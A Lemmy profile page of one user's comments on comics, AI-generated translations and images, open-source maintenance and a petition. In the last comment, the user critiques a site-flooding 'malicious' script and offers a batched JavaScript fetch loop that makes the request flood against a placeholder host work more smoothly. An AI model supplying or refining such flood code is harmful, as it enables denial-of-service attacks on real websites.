…cogito, ergo sum…

  • 52 Posts
  • 585 Comments
Joined 8 months ago
Aquileo | cake
Cake day: December 3rd, 2025

Aquileo | help-circle



  • Artwork@lemmy.worldtoHeathcliff@lemmy.worldSunday edition August 2023
    Aquileo | link
    Aquileo | fedilink
    English
    Aquileo | arrow-up
    1
    ·
    Aquileo | edit-2
    11 hours ago

    Thank you for the marvel, art you do! The design, style, colors, pace, balance is awesome…

    I just wanted to comment on the artwork I tried re-reading and realizing at least 4 times, and clarify for the last half of the work, the panels:
    - 3, 8, 9, 10, 11.

    - Panel 3 - Is it correct that the panel shows the character choosing a lovely ice-cream holding on the counter/gallery?;
    - Panel 8 - Is it correct that the character throwing the ice-cream to the bin that is already upside down, or did the ice-cream made it upside down on hit?;
    - Panel 9 - Why and how did it (the bin?) blow up?;
    - Panel 10 - How did the bin move from the back of the shop to the front?;
    - Panel 11 - Who is Laila Blenderman, and what does the excerpt about her is supposed to mean?;

    My sincere apologies for not realizing the artwork initially, but I am just curious and meanwhile want you appreciate heartfelt for effort and miracles you do, dear @[email protected]


  • Artwork@lemmy.worldtoGames@lemmy.worldFun Minecraft-esque chemistry game
    Aquileo | link
    Aquileo | fedilink
    English
    Aquileo | arrow-up
    11
    Aquileo | arrow-down
    4
    ·
    Aquileo | edit-2
    13 hours ago

    The developers describe how their game uses AI Generated Content like this:
    translations into non-English languages (otherwise I could not translate the game into everyone’s language in good time)

    Source

    If I had a chance to adventure the title, I would have the English language set, but I do not believe it’s fair for other people who don’t understand English, to read, understand, realize, comprehend, and trust a LLM/“AI” sorrowful slop the author had no way to verify and realize themselves even.

    I believe that the authors who do not understand other languages should never implement them themselves and request either professionals or open-source/collective services instead like:
    - https://crowdin.com/
    - https://weblate.org/

    A crowd-based translation would at least make it more fair, transparent, and accurate, inscribing the artwork in the infinite history with no nonsense/slop/disrespect but with indeed respect for art, people, the ineffably magnificent languages, and the history itself…

    The translation effort for Prism Launcher is hosted on Weblate, and information about translating Prism Launcher is available at https://github.com/PrismLauncher/Translations.

    Source

    All in all, sorry, I would purchase a license and support the author, since I like the concept (and I hope it was crafted/created without LLM…), but I will not.
    I will not, and try never, support such a work… so to help someone out there not reading an LLM-generated nonsense without even having a dear idea they do so.
    Some may not even notice the Steam Store annotations as the “AI” note but believe the “translated” as they were supervised by the author, yet the author did not even realize the translated at all but chose a LLM-based bloody-awful nonsense sorrow…

    Related: Crowd-based translation (…can be broken down into even more specific classifications that…)











  • AI drive-by issues, pull requests and security reports are overwhelming maintainers. Rising security expectations (thanks Mythos) require maintainers to do even more work. Open source funding is hard to secure and insufficient.

    Some of this is happening, but I’m sure as hell not seeing it in Homebrew…

    As I’ve written before, the scarcest resource in open source is not money but the motivation of the maintainers.

    # Fun Is Social

    My first real experience of OSS was with a successful

    Firstly, this was weird because, if you read the discourse online, you were typically in the camp of “KDE SUCKS, GNOME ROCKS” or “GNOME SUCKS, KDE ROCKS”. And yet: you had both groups working together. Not just working together but eating, drinking, socialising and building new friendships…

    Source

    The dear miracle of a human this is…
    Of course… Absolutely…

    Thank you… heartfelt… Soulfelt… dear Mike McQuaid…

    Please do stay safe, your Family, and I wish you success, stability, and peace…


  • The website does not list all the comments but just around ~50 without any way to load all the ~+1100 more (1132, as of 2026-07-28 2100 UTC).
    The number of em-dashes is questionable, existing in many, if not all, the comments.

    …AI may end up progressing far more quickly than societies and states can adapt… ~ Stephanie Chan, Google

    I am sorry, but I am not sure whether it’s adequate and fair to allow join such statements/petitions to only those who live in it. Isn’t it like allow deciding the future for weaponry laws to weapon and war enthusiasts only?

    And, this is not serious at this point:

    … ~ Source: Anonymous, Meta
    … ~ Source: Anonymous, Google




  • Artwork@lemmy.worldtoLiteratura en Español @lemmy.worldEl Reino Movedizo
    Aquileo | link
    Aquileo | fedilink
    English
    Aquileo | arrow-up
    2
    ·
    Aquileo | edit-2
    6 days ago

    Thank you, dear @[email protected] , but… why the LLM/AI generated empty sorrowful image… why…
    Why devalue and obliterate the overall written hard work with the generated empty nonsense…

    I’ve just found a few in my own photography backups, and not a single bit in them was generated by some sorrowful LLM effortless bloody sad algorithm…

    These took around 30 minutes each to capture and edit a little bit, but I feel a weight and value in them, where someone put an actual effort in.
    While any sorrow generated by a random awful LLM has no value, and never will.

    Please… please… don’t devalue you written miracles with an empty sorrow generated from LLMs based on stolen art of now unknown other people effort meatground inside these models…

    Please do consider capturing a moment for your works… to be left in the history You created… a work that will live after you… and someone may find a miracle in… to learn from…

    Please… do consider your history you create…



  • Just for the sake of inadequacy of the sorrowful code…

    And though I was banned on the /0 instance for a single message, too, with some experience in web-dev I just wanted to clarify regarding the possible immaturity of the sad malicious script authors, sorry…

    That attempt seems too reckless and disregards the client optimizations, I believe, and may “choke” the JavaScript engine event-loop of common clients as modern browsers, since Fetch API is asynchronous, and not to mention net::ERR_INSUFFICIENT_RESOURCES that may also cause lagging in the client.

    A few milliseconds timeout, or more adequate batching/chunks seems required. For example:

    async function fetchChunks(urls, chunkSize = 10) {
      for (let i = 0; i < urls.length; i += chunkSize) {
        const chunk = urls.slice(i, i + chunkSize);
    
        try {
            await Promise.all(chunk.map(url => fetch(url)));
        } finally {
            await new Promise(r => setTimeout(r, 50));
        }
      }
    }
    
    const urls = [];
    
    for (let i = 0; i < 50; i += 1) {
        const random = ...;
    
        urls.push(`https://test.test/$%7Brandom%7D`);
    }
    
    fetchChunks(urls);
    

    That would at least make it more adequate in the scope of User clients with less but still loading them awfully and disrespectfully… which is sorrowful indeed…

    In other words, their current “malicious” code is just…wrong…
    Regardless, such actions may tarnish someone’s history much to the point their self-confidence may not recover shortly and require a great amount of time to believe in yourself hopefully again… Therefore, let’s hope the people behind it will reconsider their actions as soon as possible… and won’t dig their own beliefs and love too deep to search for later…